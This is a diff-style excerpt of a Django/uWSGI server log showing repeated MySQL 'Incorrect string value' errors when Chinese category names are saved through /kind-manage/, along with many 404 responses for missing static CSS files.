+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE8\\xA1\\xA8\\xE7\\x99\\xBD...' for column 'k_name' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 541, in kind_manage
+ models.Kind.objects.create(k_name=k_name)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE8\\xA1\\xA8\\xE7\\x99\\xBD...' for column 'k_name' at row 1")
+[pid: 2069|app: 0|req: 149/214] 219.228.146.146 () {48 vars in 987 bytes} [Thu Jan 14 07:45:46 2021] POST /kind-manage/ => generated 206836 bytes in 103 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 150/215] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:45:46 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 151/216] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:45:46 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 152/217] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:45:46 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 153/218] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:45:46 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 154/219] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:45:46 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 155/220] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:45:46 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 30 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 156/221] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:45:46 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 157/222] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:45:46 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 158/223] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:45:46 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 159/224] 219.228.146.146 () {40 vars in 906 bytes} [Thu Jan 14 07:45:56 2021] GET /kind-manage/? => generated 6423 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 161/225] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:45:56 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 20 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 162/226] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:45:56 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 163/227] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:45:56 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 164/228] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:45:56 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 165/229] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:45:56 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 166/230] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:45:56 2021] GET /static/css/animate.css => generated 3513 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Internal Server Error: /kind-manage/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE8\\xBF\\x90\\xE5\\x8A\\xA8...' for column 'k_name' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 541, in kind_manage
+ models.Kind.objects.create(k_name=k_name)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE8\\xBF\\x90\\xE5\\x8A\\xA8...' for column 'k_name' at row 1")
+[pid: 2069|app: 0|req: 166/231] 219.228.146.146 () {48 vars in 989 bytes} [Thu Jan 14 07:45:56 2021] POST /kind-manage/? => generated 207081 bytes in 227 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 167/232] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:45:56 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 168/233] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:45:56 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 169/234] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:45:56 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 170/235] 219.228.146.253 () {40 vars in 934 bytes} [Thu Jan 14 07:45:59 2021] GET /kind-manage/? => generated 6423 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Internal Server Error: /kind-manage/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\xA0\\xA1\\xE5\\x9B\\xAD...' for column 'k_name' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 541, in kind_manage
+ models.Kind.objects.create(k_name=k_name)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\xA0\\xA1\\xE5\\x9B\\xAD...' for column 'k_name' at row 1")
+[pid: 2069|app: 0|req: 172/236] 219.228.146.253 () {48 vars in 1027 bytes} [Thu Jan 14 07:45:59 2021] POST /kind-manage/ => generated 206957 bytes in 155 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 173/237] 219.228.146.253 () {38 vars in 854 bytes} [Thu Jan 14 07:45:59 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 174/238] 219.228.146.253 () {38 vars in 898 bytes} [Thu Jan 14 07:45:59 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 175/239] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:45:59 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 176/240] 219.228.146.253 () {38 vars in 890 bytes} [Thu Jan 14 07:45:59 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 177/241] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:45:59 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 177/242] 219.228.146.253 () {38 vars in 886 bytes} [Thu Jan 14 07:45:59 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 86 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 178/243] 219.228.146.253 () {38 vars in 822 bytes} [Thu Jan 14 07:45:59 2021] GET /static/css/spinners.css => generated 3516 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 179/244] 219.228.146.253 () {38 vars in 930 bytes} [Thu Jan 14 07:45:59 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 180/245] 219.228.146.253 () {38 vars in 820 bytes} [Thu Jan 14 07:45:59 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 181/246] 219.228.146.146 () {40 vars in 905 bytes} [Thu Jan 14 07:46:02 2021] GET /kind-manage/ => generated 6423 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 182/247] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:46:02 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 183/248] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:46:02 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 184/249] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:46:03 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 185/250] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:46:03 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 186/251] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:46:03 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 187/252] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:46:03 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 188/253] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:46:03 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 37 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 189/254] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:46:03 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
